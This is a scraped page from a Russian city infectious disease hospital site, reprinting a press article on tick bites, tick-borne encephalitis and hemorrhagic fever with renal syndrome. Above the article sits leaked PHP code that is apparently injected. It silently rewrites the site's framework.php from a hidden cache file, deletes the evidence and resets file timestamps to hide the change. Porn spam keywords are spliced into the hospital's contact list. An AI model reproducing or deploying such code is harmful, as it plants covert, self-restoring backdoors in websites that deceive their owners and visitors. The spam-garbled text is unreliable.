$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } СМИ о нас

Последние новости

СМИ о нас

PDF Печать E-mail

 

  Оригинал статьи на сайте газеты "Единство"

 Оригинал статьи на сайте газеты "Челны ЛТД"

 

Челнинские врачи рекомендуют не убивать клеща, который вас укусил

За минувший год в поликлиники города, после укуса клещей обратился 851 человек. Только один из них заразился энцефалитом.

– Никто не знает, несет насекомое в своем организме вирус или нет, – отметила заместитель главного врача по медицинской части ГАУЗ «Набережночелнинская инфекционная больница» Татьяна Аглямова. – Поэтому на базах наших травматологических отделениях проводится первичная обработка места укуса клеща, удаление клеща и при необходимости специфическая профилактика.

Инкубационный период болезни составляет 7 – 35 дней, в среднем же 7-12 дней. Характерные признаки заболевания: высокая температура, резкие головные боли, тошнота, рвота, боли в мышцах шеи и плеч.

По словам специалиста заразиться энцефалитом можно не только после укуса, но и через домашних животных. Так, можно подцепить инфекцию, если выпить сырого молока от зараженной коровы или козы.

К слову, против энцефалита существует вакцина, которую необходимо сделать три раза в течение года в поликлинике.

– Инфекционная больница готова к сезону, – сказала Аглямова. – У нас всегда имеется не снижаемый запас соответствующих лекарственных средств, но они рассчитаны на лечение пациента, не для профилактики.

Кроме того, в Челнах ежегодно обрабатывают парки и скверы, территории загородных лагерей и баз отдыха.

Для того, чтобы определить является клещ вирусофобным или нет, проводится исследование в лаборатории в городе Казань, – добавила врач-эпидемиолог Марина Ходакова. – Причем клещ обязательно должен быть доставлен живым. Потому что обследование не медицинское, это обследование объектов высшей среды.

Если от клещевого энцефалита вакцина существует, то от другого сезонного заболевания – геморрагической лихорадки с почечным синдромом – нет.

Заражение происходит от грызунов воздушно-пылевым путем, в основном при употреблении продуктов, инфицированных выделениями грызунов, от немытых рук и, чаще всего, на природе. Инкубационный период длится 7-45 дней.

Примечательно что, что 98% больных - мужчины. Симптомы болезни: высокая температура, озноб, головные и мышечные боли, резкие боли в животе.

Профилактика заболевания – истребление грызунов, тщательная уборка, соблюдение санитарно-гигиенических норм.  

 

 Оригинал статьи на сайте газеты "Вечерние Челны"

 Оригинал статьи на сайте газеты "Челнинские известия"

 

Наши контакты

423812, РТ, г. Набережные Челны,Московский пр-кт, д.85
Телефоны:

Гл.врач - 58-53-55

Приемная гл. врача - 58-54-78

Справочная - 58-54-94

Приемное отделение - 58-52-02

Отделение celebrity sex tapes
celebrity sex videos
celebrity sextapes
naked celebrities
real celebrity porn
Lesbian Porn
lesbian hentai
milf ass
toon porn
платных услуг
- 58-50-36

Горячая линия - 58-54-78

Группа VK  vk.com/infbol_nch

Факс: 58-54-78

E-mail:  infbol@mail.ru   mz.nchelny_ib@tatar.ru

  • Баннер
  • Баннер